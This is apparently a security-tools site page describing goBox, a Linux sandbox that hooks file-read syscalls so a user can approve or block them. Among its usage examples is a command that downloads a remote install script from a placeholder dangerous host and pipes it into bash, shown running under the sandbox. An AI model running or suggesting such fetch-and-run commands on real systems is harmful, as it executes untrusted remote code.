goBox : GO Sandbox To Run Untrusted Code

goBox uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed. GO sandbox to run untrusted code.

Usage

Usage of ./gobox:

gobox [FLAGS] command

Flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.

Also Read – https://kalilinuxtutorials.com/dnsprobe/

Use cases

You want to install anything

> gobox -n “/etc/password.txt” npm install sketchy-module
BLOCKED READ on /etc/password.txt
>gobox -n “/etc/password.txt” bash <(curl https://danger.zone/install.sh)
BLOCKED READ on /etc/password.txt

You are interested in what file reads you favorite program makes.

Sure you could use strace, but it references file descriptors the tool makes the this much easier at a glance by printing the absolute path of the fd.

>gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

NOTE: It’s definitely a better idea to encrypt all your sensitive data, it should probably only be used when that is inconvenient or impractical.

NOTE: I haven’t made any effort for cross-x compatibility so it currently only works on linux. I’d happily accept patches to improve portability.

R K

Recent Posts

How to Prevent Software Supply Chain Attacks

What is a Software Supply Chain Attack? A software supply chain attack occurs when a…

2 weeks ago

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

4 weeks ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

4 weeks ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

4 weeks ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

4 weeks ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

4 weeks ago